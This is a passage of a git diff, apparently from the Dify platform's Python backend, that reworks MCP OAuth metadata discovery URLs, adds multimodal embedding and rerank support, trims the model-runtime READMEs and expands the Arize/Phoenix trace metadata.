embedding_model_instance = None @@ -729,6 +766,7 @@ class IndexingRunner: documents = index_processor.transform( text_docs, + current_user, embedding_model_instance=embedding_model_instance, process_rule=process_rule, tenant_id=dataset.tenant_id, @@ -737,14 +775,16 @@ class IndexingRunner: return documents - def _load_segments(self, dataset, dataset_document, documents): + def _load_segments(self, dataset: Dataset, dataset_document: DatasetDocument, documents: list[Document]): # save node to document segment doc_store = DatasetDocumentStore( dataset=dataset, user_id=dataset_document.created_by, document_id=dataset_document.id ) # add document segments - doc_store.add_documents(docs=documents, save_child=dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX) + doc_store.add_documents( + docs=documents, save_child=dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX + ) # update document status to indexing cur_time = naive_utc_now() diff --git a/api/core/mcp/auth/auth_flow.py 
b/api/core/mcp/auth/auth_flow.py index 92787b39dd..aef1afb235 100644 --- a/api/core/mcp/auth/auth_flow.py +++ b/api/core/mcp/auth/auth_flow.py @@ -47,7 +47,11 @@ def build_protected_resource_metadata_discovery_urls( """ Build a list of URLs to try for Protected Resource Metadata discovery. - Per SEP-985, supports fallback when discovery fails at one URL. + Per RFC 9728 Section 5.1, supports fallback when discovery fails at one URL. + Priority order: + 1. URL from WWW-Authenticate header (if provided) + 2. Well-known URI with path: https://example.com/.well-known/oauth-protected-resource/public/mcp + 3. Well-known URI at root: https://example.com/.well-known/oauth-protected-resource """ urls = [] @@ -58,9 +62,18 @@ def build_protected_resource_metadata_discovery_urls( # Fallback: construct from server URL parsed = urlparse(server_url) base_url = f"{parsed.scheme}://{parsed.netloc}" - fallback_url = urljoin(base_url, "/.well-known/oauth-protected-resource") - if fallback_url not in urls: - urls.append(fallback_url) + path = parsed.path.rstrip("/") + + # Priority 2: With path insertion (e.g., /.well-known/oauth-protected-resource/public/mcp) + if path: + path_url = f"{base_url}/.well-known/oauth-protected-resource{path}" + if path_url not in urls: + urls.append(path_url) + + # Priority 3: At root (e.g., /.well-known/oauth-protected-resource) + root_url = f"{base_url}/.well-known/oauth-protected-resource" + if root_url not in urls: + urls.append(root_url) return urls @@ -71,30 +84,34 @@ def build_oauth_authorization_server_metadata_discovery_urls(auth_server_url: st Supports both OAuth 2.0 (RFC 8414) and OpenID Connect discovery. - Per RFC 8414 section 3: - - If issuer has no path: https://example.com/.well-known/oauth-authorization-server - - If issuer has path: https://example.com/.well-known/oauth-authorization-server{path} - - Example: - - issuer: https://example.com/oauth - - metadata: https://example.com/.well-known/oauth-authorization-server/oauth + Per RFC 8414 section 3.1 and section 5, try all possible endpoints: + - OAuth 2.0 with path insertion: https://example.com/.well-known/oauth-authorization-server/tenant1 + - OpenID Connect with path insertion: https://example.com/.well-known/openid-configuration/tenant1 + - OpenID Connect path appending: https://example.com/tenant1/.well-known/openid-configuration + - OAuth 2.0 at root: https://example.com/.well-known/oauth-authorization-server + - OpenID Connect at root: https://example.com/.well-known/openid-configuration """ urls = [] base_url = auth_server_url or server_url parsed = urlparse(base_url) base = f"{parsed.scheme}://{parsed.netloc}" - path = parsed.path.rstrip("/") # Remove trailing slash + path = parsed.path.rstrip("/") + # OAuth 2.0 Authorization Server Metadata at root (MCP-03-26) + urls.append(f"{base}/.well-known/oauth-authorization-server") - # Try OpenID Connect discovery first (more common) - urls.append(urljoin(base + "/", ".well-known/openid-configuration")) + # OpenID Connect Discovery at root + urls.append(f"{base}/.well-known/openid-configuration") - # OAuth 2.0 Authorization Server Metadata (RFC 8414) - # Include the path component if present in the issuer URL if path: - urls.append(urljoin(base, f".well-known/oauth-authorization-server{path}")) - else: - urls.append(urljoin(base, ".well-known/oauth-authorization-server")) + # OpenID Connect Discovery with path insertion + urls.append(f"{base}/.well-known/openid-configuration{path}") + + # OpenID Connect Discovery path appending + 
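To make the resulting fallback order concrete (the final appends of this branch continue just below), here is a small, dependency-free replica of the authorization-server URL builder; the standalone function name is illustrative, but the URL ordering mirrors the diff:

```python
from urllib.parse import urlparse

def metadata_discovery_urls(auth_server_url: str) -> list[str]:
    # Root endpoints are tried first, then path-insertion and
    # path-appending variants, matching the rewritten helper above.
    parsed = urlparse(auth_server_url)
    base = f"{parsed.scheme}://{parsed.netloc}"
    path = parsed.path.rstrip("/")
    urls = [
        f"{base}/.well-known/oauth-authorization-server",
        f"{base}/.well-known/openid-configuration",
    ]
    if path:
        urls += [
            f"{base}/.well-known/openid-configuration{path}",
            f"{base}{path}/.well-known/openid-configuration",
            f"{base}/.well-known/oauth-authorization-server{path}",
        ]
    return urls

# For an issuer with a path component:
assert metadata_discovery_urls("https://example.com/tenant1") == [
    "https://example.com/.well-known/oauth-authorization-server",
    "https://example.com/.well-known/openid-configuration",
    "https://example.com/.well-known/openid-configuration/tenant1",
    "https://example.com/tenant1/.well-known/openid-configuration",
    "https://example.com/.well-known/oauth-authorization-server/tenant1",
]
```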
urls.append(f"{base}{path}/.well-known/openid-configuration") + + # OAuth 2.0 Authorization Server Metadata with path insertion + urls.append(f"{base}/.well-known/oauth-authorization-server{path}") return urls diff --git a/api/core/mcp/mcp_client.py b/api/core/mcp/mcp_client.py index b0e0dab9be..2b0645b558 100644 --- a/api/core/mcp/mcp_client.py +++ b/api/core/mcp/mcp_client.py @@ -59,7 +59,7 @@ class MCPClient: try: logger.debug("Not supported method %s found in URL path, trying default 'mcp' method.", method_name) self.connect_server(sse_client, "sse") - except MCPConnectionError: + except (MCPConnectionError, ValueError): logger.debug("MCP connection failed with 'sse', falling back to 'mcp' method.") self.connect_server(streamablehttp_client, "mcp") diff --git a/api/core/model_manager.py b/api/core/model_manager.py index a63e94d59c..5a28bbcc3a 100644 --- a/api/core/model_manager.py +++ b/api/core/model_manager.py @@ -10,9 +10,9 @@ from core.errors.error import ProviderTokenNotInitError from core.model_runtime.callbacks.base_callback import Callback from core.model_runtime.entities.llm_entities import LLMResult from core.model_runtime.entities.message_entities import PromptMessage, PromptMessageTool -from core.model_runtime.entities.model_entities import ModelType +from core.model_runtime.entities.model_entities import ModelFeature, ModelType from core.model_runtime.entities.rerank_entities import RerankResult -from core.model_runtime.entities.text_embedding_entities import TextEmbeddingResult +from core.model_runtime.entities.text_embedding_entities import EmbeddingResult from core.model_runtime.errors.invoke import InvokeAuthorizationError, InvokeConnectionError, InvokeRateLimitError from core.model_runtime.model_providers.__base.large_language_model import LargeLanguageModel from core.model_runtime.model_providers.__base.moderation_model import ModerationModel @@ -200,7 +200,7 @@ class ModelInstance: def invoke_text_embedding( self, texts: list[str], user: str | None = None, input_type: EmbeddingInputType = EmbeddingInputType.DOCUMENT - ) -> TextEmbeddingResult: + ) -> EmbeddingResult: """ Invoke large language model @@ -212,7 +212,7 @@ class ModelInstance: if not isinstance(self.model_type_instance, TextEmbeddingModel): raise Exception("Model type instance is not TextEmbeddingModel") return cast( - TextEmbeddingResult, + EmbeddingResult, self._round_robin_invoke( function=self.model_type_instance.invoke, model=self.model, @@ -223,6 +223,34 @@ class ModelInstance: ), ) + def invoke_multimodal_embedding( + self, + multimodel_documents: list[dict], + user: str | None = None, + input_type: EmbeddingInputType = EmbeddingInputType.DOCUMENT, + ) -> EmbeddingResult: + """ + Invoke large language model + + :param multimodel_documents: multimodel documents to embed + :param user: unique user id + :param input_type: input type + :return: embeddings result + """ + if not isinstance(self.model_type_instance, TextEmbeddingModel): + raise Exception("Model type instance is not TextEmbeddingModel") + return cast( + EmbeddingResult, + self._round_robin_invoke( + function=self.model_type_instance.invoke, + model=self.model, + credentials=self.credentials, + multimodel_documents=multimodel_documents, + user=user, + input_type=input_type, + ), + ) + def get_text_embedding_num_tokens(self, texts: list[str]) -> list[int]: """ Get number of tokens for text embedding @@ -276,6 +304,40 @@ class ModelInstance: ), ) + def invoke_multimodal_rerank( + self, + query: dict, + docs: list[dict], + score_threshold: 
float | None = None, + top_n: int | None = None, + user: str | None = None, + ) -> RerankResult: + """ + Invoke rerank model + + :param query: search query + :param docs: docs for reranking + :param score_threshold: score threshold + :param top_n: top n + :param user: unique user id + :return: rerank result + """ + if not isinstance(self.model_type_instance, RerankModel): + raise Exception("Model type instance is not RerankModel") + return cast( + RerankResult, + self._round_robin_invoke( + function=self.model_type_instance.invoke_multimodal_rerank, + model=self.model, + credentials=self.credentials, + query=query, + docs=docs, + score_threshold=score_threshold, + top_n=top_n, + user=user, + ), + ) + def invoke_moderation(self, text: str, user: str | None = None) -> bool: """ Invoke moderation model @@ -461,6 +523,32 @@ class ModelManager: model=default_model_entity.model, ) + def check_model_support_vision(self, tenant_id: str, provider: str, model: str, model_type: ModelType) -> bool: + """ + Check if model supports vision + :param tenant_id: tenant id + :param provider: provider name + :param model: model name + :return: True if model supports vision, False otherwise + """ + model_instance = self.get_model_instance(tenant_id, provider, model_type, model) + model_type_instance = model_instance.model_type_instance + match model_type: + case ModelType.LLM: + model_type_instance = cast(LargeLanguageModel, model_type_instance) + case ModelType.TEXT_EMBEDDING: + model_type_instance = cast(TextEmbeddingModel, model_type_instance) + case ModelType.RERANK: + model_type_instance = cast(RerankModel, model_type_instance) + case _: + raise ValueError(f"Model type {model_type} is not supported") + model_schema = model_type_instance.get_model_schema(model, model_instance.credentials) + if not model_schema: + return False + if model_schema.features and ModelFeature.VISION in model_schema.features: + return True + return False + class LBModelManager: def __init__( diff --git a/api/core/model_runtime/README.md b/api/core/model_runtime/README.md index a6caa7eb1e..b9d2c55210 100644 --- a/api/core/model_runtime/README.md +++ b/api/core/model_runtime/README.md @@ -18,34 +18,20 @@ This module provides the interface for invoking and authenticating various model - Model provider display - ![image-20231210143654461](./docs/en_US/images/index/image-20231210143654461.png) - - Displays a list of all supported providers, including provider names, icons, supported model types list, predefined model list, configuration method, and credentials form rules, etc. For detailed rule design, see: [Schema](./docs/en_US/schema.md). + Displays a list of all supported providers, including provider names, icons, supported model types list, predefined model list, configuration method, and credentials form rules, etc. - Selectable model list display - ![image-20231210144229650](./docs/en_US/images/index/image-20231210144229650.png) - After configuring provider/model credentials, the dropdown (application orchestration interface/default model) allows viewing of the available LLM list. Greyed out items represent predefined model lists from providers without configured credentials, facilitating user review of supported models. 
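A sketch of how the `ModelInstance`/`ModelManager` additions above might be exercised. Tenant, provider, and model identifiers are placeholders, the document payload shape is an assumption (the diff only requires `list[dict]`), and the `multimodel_documents` keyword is spelled as in the diff:

```python
from core.model_manager import ModelManager
from core.model_runtime.entities.model_entities import ModelType

manager = ModelManager()
# Hypothetical identifiers for illustration only.
tenant_id, provider, model = "tenant-uuid", "provider-name", "embedding-model"

if manager.check_model_support_vision(tenant_id, provider, model, ModelType.TEXT_EMBEDDING):
    instance = manager.get_model_instance(tenant_id, provider, ModelType.TEXT_EMBEDDING, model)
    result = instance.invoke_multimodal_embedding(
        # Payload shape below is assumed, not specified by the diff.
        multimodel_documents=[{"type": "image", "url": "https://example.com/cat.png"}],
    )
    print(result.model, len(result.embeddings))
```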
- In addition, this list also returns configurable parameter information and rules for LLM, as shown below: - - ![image-20231210144814617](./docs/en_US/images/index/image-20231210144814617.png) - - These parameters are all defined in the backend, allowing different settings for various parameters supported by different models, as detailed in: [Schema](./docs/en_US/schema.md#ParameterRule). + In addition, this list also returns configurable parameter information and rules for LLM. These parameters are all defined in the backend, allowing different settings for various parameters supported by different models. - Provider/model credential authentication - ![image-20231210151548521](./docs/en_US/images/index/image-20231210151548521.png) - - ![image-20231210151628992](./docs/en_US/images/index/image-20231210151628992.png) - - The provider list returns configuration information for the credentials form, which can be authenticated through Runtime's interface. The first image above is a provider credential DEMO, and the second is a model credential DEMO. + The provider list returns configuration information for the credentials form, which can be authenticated through Runtime's interface. ## Structure -![](./docs/en_US/images/index/image-20231210165243632.png) - Model Runtime is divided into three layers: - The outermost layer is the factory method @@ -60,9 +46,6 @@ Model Runtime is divided into three layers: It offers direct invocation of various model types, predefined model configuration information, getting predefined/remote model lists, model credential authentication methods. Different models provide additional special methods, like LLM's pre-computed tokens method, cost information obtaining method, etc., **allowing horizontal expansion** for different models under the same provider (within supported model types). -## Next Steps +## Documentation -- Add new provider configuration: [Link](./docs/en_US/provider_scale_out.md) -- Add new models for existing providers: [Link](./docs/en_US/provider_scale_out.md#AddModel) -- View YAML configuration rules: [Link](./docs/en_US/schema.md) -- Implement interface methods: [Link](./docs/en_US/interfaces.md) +For detailed documentation on how to add new providers or models, please refer to the [Dify documentation](https://docs.dify.ai/). 
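The entities change that follows renames `TextEmbeddingResult` to `EmbeddingResult` and adds a parallel `FileEmbeddingResult`. A minimal local mirror of the shared shape, using only the fields visible in the diff (the real `EmbeddingUsage` also carries token and pricing fields):

```python
from pydantic import BaseModel

class EmbeddingUsage(BaseModel):
    latency: float  # only field visible in the diff; the real class has more

class EmbeddingResult(BaseModel):
    model: str
    embeddings: list[list[float]]
    usage: EmbeddingUsage

r = EmbeddingResult(model="m", embeddings=[[0.1, 0.2]], usage=EmbeddingUsage(latency=0.01))
assert len(r.embeddings[0]) == 2
```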
diff --git a/api/core/model_runtime/README_CN.md b/api/core/model_runtime/README_CN.md index dfe614347a..0a8b56b3fe 100644 --- a/api/core/model_runtime/README_CN.md +++ b/api/core/model_runtime/README_CN.md @@ -18,34 +18,20 @@ - 模型供应商展示 - ![image-20231210143654461](./docs/zh_Hans/images/index/image-20231210143654461.png) - -​ 展示所有已支持的供应商列表,除了返回供应商名称、图标之外,还提供了支持的模型类型列表,预定义模型列表、配置方式以及配置凭据的表单规则等等,规则设计详见:[Schema](./docs/zh_Hans/schema.md)。 + 展示所有已支持的供应商列表,除了返回供应商名称、图标之外,还提供了支持的模型类型列表,预定义模型列表、配置方式以及配置凭据的表单规则等等。 - 可选择的模型列表展示 - ![image-20231210144229650](./docs/zh_Hans/images/index/image-20231210144229650.png) + 配置供应商/模型凭据后,可在此下拉(应用编排界面/默认模型)查看可用的 LLM 列表,其中灰色的为未配置凭据供应商的预定义模型列表,方便用户查看已支持的模型。 -​ 配置供应商/模型凭据后,可在此下拉(应用编排界面/默认模型)查看可用的 LLM 列表,其中灰色的为未配置凭据供应商的预定义模型列表,方便用户查看已支持的模型。 - -​ 除此之外,该列表还返回了 LLM 可配置的参数信息和规则,如下图: - -​ ![image-20231210144814617](./docs/zh_Hans/images/index/image-20231210144814617.png) - -​ 这里的参数均为后端定义,相比之前只有 5 种固定参数,这里可为不同模型设置所支持的各种参数,详见:[Schema](./docs/zh_Hans/schema.md#ParameterRule)。 + 除此之外,该列表还返回了 LLM 可配置的参数信息和规则。这里的参数均为后端定义,相比之前只有 5 种固定参数,这里可为不同模型设置所支持的各种参数。 - 供应商/模型凭据鉴权 - ![image-20231210151548521](./docs/zh_Hans/images/index/image-20231210151548521.png) - -![image-20231210151628992](./docs/zh_Hans/images/index/image-20231210151628992.png) - -​ 供应商列表返回了凭据表单的配置信息,可通过 Runtime 提供的接口对凭据进行鉴权,上图 1 为供应商凭据 DEMO,上图 2 为模型凭据 DEMO。 + 供应商列表返回了凭据表单的配置信息,可通过 Runtime 提供的接口对凭据进行鉴权。 ## 结构 -![](./docs/zh_Hans/images/index/image-20231210165243632.png) - Model Runtime 分三层: - 最外层为工厂方法 @@ -59,8 +45,7 @@ Model Runtime 分三层: 对于供应商/模型凭据,有两种情况 - 如 OpenAI 这类中心化供应商,需要定义如**api_key**这类的鉴权凭据 - - 如[**Xinference**](https://github.com/xorbitsai/inference)这类本地部署的供应商,需要定义如**server_url**这类的地址凭据,有时候还需要定义**model_uid**之类的模型类型凭据,就像下面这样,当在供应商层定义了这些凭据后,就可以在前端页面上直接展示,无需修改前端逻辑。 - ![Alt text](docs/zh_Hans/images/index/image.png) + - 如[**Xinference**](https://github.com/xorbitsai/inference)这类本地部署的供应商,需要定义如**server_url**这类的地址凭据,有时候还需要定义**model_uid**之类的模型类型凭据。当在供应商层定义了这些凭据后,就可以在前端页面上直接展示,无需修改前端逻辑。 当配置好凭据后,就可以通过 DifyRuntime 的外部接口直接获取到对应供应商所需要的**Schema**(凭据表单规则),从而在可以在不修改前端逻辑的情况下,提供新的供应商/模型的支持。 @@ -74,20 +59,6 @@ Model Runtime 分三层: - 模型凭据 (**在供应商层定义**):这是一类不经常变动,一般在配置好后就不会再变动的参数,如 **api_key**、**server_url** 等。在 DifyRuntime 中,他们的参数名一般为**credentials: dict[str, any]**,Provider 层的 credentials 会直接被传递到这一层,不需要再单独定义。 -## 下一步 +## 文档 -### [增加新的供应商配置 👈🏻](./docs/zh_Hans/provider_scale_out.md) - -当添加后,这里将会出现一个新的供应商 - -![Alt text](docs/zh_Hans/images/index/image-1.png) - -### [为已存在的供应商新增模型 👈🏻](./docs/zh_Hans/provider_scale_out.md#%E5%A2%9E%E5%8A%A0%E6%A8%A1%E5%9E%8B) - -当添加后,对应供应商的模型列表中将会出现一个新的预定义模型供用户选择,如 GPT-3.5 GPT-4 ChatGLM3-6b 等,而对于支持自定义模型的供应商,则不需要新增模型。 - -![Alt text](docs/zh_Hans/images/index/image-2.png) - -### [接口的具体实现 👈🏻](./docs/zh_Hans/interfaces.md) - -你可以在这里找到你想要查看的接口的具体实现,以及接口的参数和返回值的具体含义。 +有关如何添加新供应商或模型的详细文档,请参阅 [Dify 文档](https://docs.dify.ai/)。 diff --git a/api/core/model_runtime/entities/text_embedding_entities.py b/api/core/model_runtime/entities/text_embedding_entities.py index 846b89d658..854c448250 100644 --- a/api/core/model_runtime/entities/text_embedding_entities.py +++ b/api/core/model_runtime/entities/text_embedding_entities.py @@ -19,7 +19,7 @@ class EmbeddingUsage(ModelUsage): latency: float -class TextEmbeddingResult(BaseModel): +class EmbeddingResult(BaseModel): """ Model class for text embedding result. """ @@ -27,3 +27,13 @@ class TextEmbeddingResult(BaseModel): model: str embeddings: list[list[float]] usage: EmbeddingUsage + + +class FileEmbeddingResult(BaseModel): + """ + Model class for file embedding result. 
+ """ + + model: str + embeddings: list[list[float]] + usage: EmbeddingUsage diff --git a/api/core/model_runtime/model_providers/__base/rerank_model.py b/api/core/model_runtime/model_providers/__base/rerank_model.py index 36067118b0..0a576b832a 100644 --- a/api/core/model_runtime/model_providers/__base/rerank_model.py +++ b/api/core/model_runtime/model_providers/__base/rerank_model.py @@ -50,3 +50,43 @@ class RerankModel(AIModel): ) except Exception as e: raise self._transform_invoke_error(e) + + def invoke_multimodal_rerank( + self, + model: str, + credentials: dict, + query: dict, + docs: list[dict], + score_threshold: float | None = None, + top_n: int | None = None, + user: str | None = None, + ) -> RerankResult: + """ + Invoke multimodal rerank model + :param model: model name + :param credentials: model credentials + :param query: search query + :param docs: docs for reranking + :param score_threshold: score threshold + :param top_n: top n + :param user: unique user id + :return: rerank result + """ + try: + from core.plugin.impl.model import PluginModelClient + + plugin_model_manager = PluginModelClient() + return plugin_model_manager.invoke_multimodal_rerank( + tenant_id=self.tenant_id, + user_id=user or "unknown", + plugin_id=self.plugin_id, + provider=self.provider_name, + model=model, + credentials=credentials, + query=query, + docs=docs, + score_threshold=score_threshold, + top_n=top_n, + ) + except Exception as e: + raise self._transform_invoke_error(e) diff --git a/api/core/model_runtime/model_providers/__base/text_embedding_model.py b/api/core/model_runtime/model_providers/__base/text_embedding_model.py index bd68ffe903..4c902e2c11 100644 --- a/api/core/model_runtime/model_providers/__base/text_embedding_model.py +++ b/api/core/model_runtime/model_providers/__base/text_embedding_model.py @@ -2,7 +2,7 @@ from pydantic import ConfigDict from core.entities.embedding_type import EmbeddingInputType from core.model_runtime.entities.model_entities import ModelPropertyKey, ModelType -from core.model_runtime.entities.text_embedding_entities import TextEmbeddingResult +from core.model_runtime.entities.text_embedding_entities import EmbeddingResult from core.model_runtime.model_providers.__base.ai_model import AIModel @@ -20,16 +20,18 @@ class TextEmbeddingModel(AIModel): self, model: str, credentials: dict, - texts: list[str], + texts: list[str] | None = None, + multimodel_documents: list[dict] | None = None, user: str | None = None, input_type: EmbeddingInputType = EmbeddingInputType.DOCUMENT, - ) -> TextEmbeddingResult: + ) -> EmbeddingResult: """ Invoke text embedding model :param model: model name :param credentials: model credentials :param texts: texts to embed + :param files: files to embed :param user: unique user id :param input_type: input type :return: embeddings result @@ -38,16 +40,29 @@ class TextEmbeddingModel(AIModel): try: plugin_model_manager = PluginModelClient() - return plugin_model_manager.invoke_text_embedding( - tenant_id=self.tenant_id, - user_id=user or "unknown", - plugin_id=self.plugin_id, - provider=self.provider_name, - model=model, - credentials=credentials, - texts=texts, - input_type=input_type, - ) + if texts: + return plugin_model_manager.invoke_text_embedding( + tenant_id=self.tenant_id, + user_id=user or "unknown", + plugin_id=self.plugin_id, + provider=self.provider_name, + model=model, + credentials=credentials, + texts=texts, + input_type=input_type, + ) + if multimodel_documents: + return plugin_model_manager.invoke_multimodal_embedding( + 
tenant_id=self.tenant_id, + user_id=user or "unknown", + plugin_id=self.plugin_id, + provider=self.provider_name, + model=model, + credentials=credentials, + documents=multimodel_documents, + input_type=input_type, + ) + raise ValueError("No texts or files provided") except Exception as e: raise self._transform_invoke_error(e) diff --git a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py index 347992fa0d..a7b73e032e 100644 --- a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py +++ b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py @@ -6,7 +6,13 @@ from datetime import datetime, timedelta from typing import Any, Union, cast from urllib.parse import urlparse -from openinference.semconv.trace import OpenInferenceMimeTypeValues, OpenInferenceSpanKindValues, SpanAttributes +from openinference.semconv.trace import ( + MessageAttributes, + OpenInferenceMimeTypeValues, + OpenInferenceSpanKindValues, + SpanAttributes, + ToolCallAttributes, +) from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter as GrpcOTLPSpanExporter from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter as HttpOTLPSpanExporter from opentelemetry.sdk import trace as trace_sdk @@ -95,14 +101,14 @@ def setup_tracer(arize_phoenix_config: ArizeConfig | PhoenixConfig) -> tuple[tra def datetime_to_nanos(dt: datetime | None) -> int: - """Convert datetime to nanoseconds since epoch. If None, use current time.""" + """Convert datetime to nanoseconds since epoch for Arize/Phoenix.""" if dt is None: dt = datetime.now() return int(dt.timestamp() * 1_000_000_000) def error_to_string(error: Exception | str | None) -> str: - """Convert an error to a string with traceback information.""" + """Convert an error to a string with traceback information for Arize/Phoenix.""" error_message = "Empty Stack Trace" if error: if isinstance(error, Exception): @@ -114,7 +120,7 @@ def error_to_string(error: Exception | str | None) -> str: def set_span_status(current_span: Span, error: Exception | str | None = None): - """Set the status of the current span based on the presence of an error.""" + """Set the status of the current span based on the presence of an error for Arize/Phoenix.""" if error: error_string = error_to_string(error) current_span.set_status(Status(StatusCode.ERROR, error_string)) @@ -138,10 +144,17 @@ def set_span_status(current_span: Span, error: Exception | str | None = None): def safe_json_dumps(obj: Any) -> str: - """A convenience wrapper around `json.dumps` that ensures that any object can be safely encoded.""" + """A convenience wrapper to ensure that any object can be safely encoded for Arize/Phoenix.""" return json.dumps(obj, default=str, ensure_ascii=False) +def wrap_span_metadata(metadata, **kwargs): + """Add common metatada to all trace entity types for Arize/Phoenix.""" + metadata["created_from"] = "Dify" + metadata.update(kwargs) + return metadata + + class ArizePhoenixDataTrace(BaseTraceInstance): def __init__( self, @@ -183,16 +196,27 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise def workflow_trace(self, trace_info: WorkflowTraceInfo): - workflow_metadata = { - "workflow_run_id": trace_info.workflow_run_id or "", - "message_id": trace_info.message_id or "", - "workflow_app_log_id": trace_info.workflow_app_log_id or "", - "status": trace_info.workflow_run_status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": 
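The patched `TextEmbeddingModel.invoke` above now routes to one of two plugin-daemon endpoints depending on which input is supplied. A dependency-free sketch of that dispatch (the dispatcher function itself is illustrative; the route strings match the `PluginModelClient` paths in this patch):

```python
from typing import Any

def invoke_embedding(texts: list[str] | None = None,
                     multimodel_documents: list[dict] | None = None) -> dict[str, Any]:
    # Mirrors the dispatch order in TextEmbeddingModel.invoke: text input wins,
    # then multimodal documents, otherwise it is a caller error.
    if texts:
        return {"route": "text_embedding/invoke", "payload": {"texts": texts}}
    if multimodel_documents:
        return {"route": "multimodal_embedding/invoke", "payload": {"documents": multimodel_documents}}
    raise ValueError("No texts or multimodal documents provided")

assert invoke_embedding(texts=["hello"])["route"] == "text_embedding/invoke"
```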
trace_info.total_tokens or 0, - } - workflow_metadata.update(trace_info.metadata) + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] + + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.workflow_run_status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="workflow", + conversation_id=trace_info.conversation_id or "", + workflow_app_log_id=trace_info.workflow_app_log_id or "", + workflow_id=trace_info.workflow_id or "", + tenant_id=trace_info.tenant_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + workflow_run_elapsed_time=trace_info.workflow_run_elapsed_time or 0, + workflow_run_version=trace_info.workflow_run_version or "", + total_tokens=trace_info.total_tokens or 0, + file_list=safe_json_dumps(file_list), + query=trace_info.query or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.workflow_run_id self.ensure_root_span(dify_trace_id) @@ -201,10 +225,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): workflow_span = self.tracer.start_span( name=TraceTaskName.WORKFLOW_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.workflow_run_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.workflow_run_outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(workflow_metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.workflow_run_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.workflow_run_outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), @@ -257,6 +283,7 @@ class ArizePhoenixDataTrace(BaseTraceInstance): "app_id": app_id, "app_name": node_execution.title, "status": node_execution.status, + "status_message": node_execution.error or "", "level": "ERROR" if node_execution.status == "failed" else "DEFAULT", } ) @@ -290,11 +317,11 @@ class ArizePhoenixDataTrace(BaseTraceInstance): node_span = self.tracer.start_span( name=node_execution.node_type, attributes={ + SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.INPUT_VALUE: safe_json_dumps(inputs_value), SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: safe_json_dumps(outputs_value), SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, - SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.METADATA: safe_json_dumps(node_metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, @@ -339,30 +366,37 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def message_trace(self, trace_info: MessageTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping message trace.") return - file_list = cast(list[str], trace_info.file_list) or [] + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] message_file_data: MessageFile | None = trace_info.message_file_data if message_file_data is not None: file_url = 
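`wrap_span_metadata`, defined above, stamps a common origin marker before merging per-trace fields; note that it mutates and returns the same dict, so call sites can use it inline:

```python
def wrap_span_metadata(metadata, **kwargs):
    """Add common metadata to all trace entity types for Arize/Phoenix."""
    metadata["created_from"] = "Dify"
    metadata.update(kwargs)
    return metadata

meta = wrap_span_metadata({}, trace_entity_type="message", status="normal")
assert meta == {"created_from": "Dify", "trace_entity_type": "message", "status": "normal"}
```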
f"{self.file_base_url}/{message_file_data.url}" if message_file_data else "" file_list.append(file_url) - message_metadata = { - "message_id": trace_info.message_id or "", - "conversation_mode": str(trace_info.conversation_mode or ""), - "user_id": trace_info.message_data.from_account_id or "", - "file_list": json.dumps(file_list), - "status": trace_info.message_data.status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - "prompt_tokens": trace_info.message_tokens or 0, - "completion_tokens": trace_info.answer_tokens or 0, - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - message_metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="message", + conversation_model=trace_info.conversation_model or "", + message_tokens=trace_info.message_tokens or 0, + answer_tokens=trace_info.answer_tokens or 0, + total_tokens=trace_info.total_tokens or 0, + conversation_mode=trace_info.conversation_mode or "", + gen_ai_server_time_to_first_token=trace_info.gen_ai_server_time_to_first_token or 0, + llm_streaming_time_to_generate=trace_info.llm_streaming_time_to_generate or 0, + is_streaming_request=trace_info.is_streaming_request or False, + user_id=trace_info.message_data.from_account_id or "", + file_list=safe_json_dumps(file_list), + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) # Add end user data if available if trace_info.message_data.from_end_user_id: @@ -370,14 +404,16 